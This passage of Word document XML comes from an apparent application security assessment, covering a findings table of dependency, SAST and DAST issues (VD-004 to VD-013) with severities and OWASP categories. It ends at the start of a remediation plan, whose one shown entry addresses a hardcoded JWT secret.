              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6EEBB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9F9A8F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-004</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A9D890">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerable axios (15 CVEs)</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F266BC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SCA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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18289F71">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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45094F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A06:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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68EC08">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0920F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9F2C50">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-005</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537CDB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerable xmldom (5 CVEs)</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6B56FE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SCA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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5B425C12">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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26DB29">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A06:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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55A03C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="14149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E1EA58">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-006</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B14D77">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerable react-router (7 CVEs)</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CB6A6A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SCA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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1F65CDF2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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FD6889">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A06:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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03C47E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7DBCE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4BC988">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-007</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4BBFFA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Path traversal in file serve</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5DBDD3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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4404518A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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750080">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A01:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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1228C6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="42279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F2DCFE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-008</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80D4FA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Weak PRNG reset tokens</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FECF83">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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7625D2D2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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9F96EC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A02:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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96FA69">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3C59B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65A84B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-009</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C40F16">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Broken CSP (5 ZAP alerts)</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098A0B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DAST</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407A7A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C12"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</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E8EEEC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A05:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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43D20D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0632C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707608">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-010</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345427">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Missing clickjacking protection</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EC7566">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DAST</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35BF4D61">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C12"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</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62435A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A05:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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96B4FB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="754E4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BD1B1C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-011</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4E99AF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Moderate dep vulnerabilities</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66F63B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SCA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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22750812">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C12"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</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3BD085">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A06:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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2C8594">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="086D6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BE94A2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-012</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DD7956">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Missing security headers (5)</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AA0244">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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tcPr>
          <w:p w14:paraId="282853A5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</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767CF6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A05:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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120193">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2A8E7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110C45">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-013</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2F8790">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>X-Powered-By info leak</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A3EB99">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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tcPr>
          <w:p w14:paraId="5B386605">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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01F74F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A05:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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BEFC96">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E6C468C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B668FC4">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>6. Remediation Plan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8B6777">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Each finding has a specific remediation action. Fixes are prioritized by severity and ordered for implementation. After all fixes are applied, the pipeline will be re-run to verify the SCA quality gate passes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A18CD33">
      <w:pPr>
        <w:spacing w:before="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500"/>
        <w:gridCol w:w="4060"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr w14:paraId="26F26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6EDF0F4D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="25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12473DDA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="406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763DEDEA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fix Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A5276" w:sz="0" w:space="0"/>
              <w:left w:val="single" w:color="1A5276" w:sz="0" w:space="0"/>
              <w:bottom w:val="single" w:color="1A5276" w:sz="0" w:space="0"/>
              <w:right w:val="single" w:color="1A5276" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A5276"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="22B2DD19">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="22AAF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BDBEB1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-001</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FD936B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Hardcoded JWT secret</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EBC0C6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remove fallback; crash on startup if JWT_SECRET env var is missing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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tcPr>
          <w:p w14:paraId="52C5F2EB">
            <w:pPr>
              <w:jc w:val="center"/>
